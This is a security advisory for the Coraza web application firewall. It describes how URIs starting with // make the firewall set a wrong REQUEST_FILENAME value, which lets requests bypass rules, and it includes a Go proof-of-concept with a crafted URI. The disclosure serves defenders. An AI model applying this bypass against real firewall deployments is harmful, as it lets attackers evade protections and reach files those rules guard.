GHSA-q9f5-625g-xm39

Summary

URLs starting with // are not parsed properly, and the request REQUEST_FILENAME variable contains a wrong value, leading to potential rules bypass.

Details

If a request is made on an URI starting with //, coraza will set a wrong value in REQUEST_FILENAME. For example, if the URI //bar/uploads/foo.php?a=b is passed to coraza: , REQUEST_FILENAME will be set to /uploads/foo.php.

The root cause is the usage of url.Parse to parse the URI in ProcessURI.

url.Parse can parse both absolute URLs (starting with a scheme) or relative ones (just the path). //bar/uploads/foo.php is a valid absolute URI (the scheme is empty), url.Parse will consider bar as the host and the path will be set to /uploads/foo.php.

PoC

package main

import (
    "fmt"
    "net/url"
    "os"

    "github.com/corazawaf/coraza/v3"
)

const testRule = `
SecDebugLogLevel 9
SecDebugLog /dev/stdout
SecRule REQUEST_FILENAME "@rx /bar/uploads/.*\.(h?ph(p|tm?l?|ar)|module|shtml)" "id:1,phase:1,deny"
`

func main() {
    var testURL = "//bar/uploads/foo.php"

    if os.Getenv("TEST_URL") != "" {
        testURL = os.Getenv("TEST_URL")
    }

    fmt.Printf("Testing URL: %s\n", testURL)

    config := coraza.NewWAFConfig().WithDirectives(testRule)

    waf, err := coraza.NewWAF(config)

    if err != nil {
        panic(err)
    }

    tx := waf.NewTransaction()

    tx.ProcessURI(testURL, "GET", "HTTP/1.1")

    in := tx.ProcessRequestHeaders()

    if in != nil {
        fmt.Printf("%+v\n", in)
    }
}

Impact

Potential bypass of rules using REQUEST_FILENAME.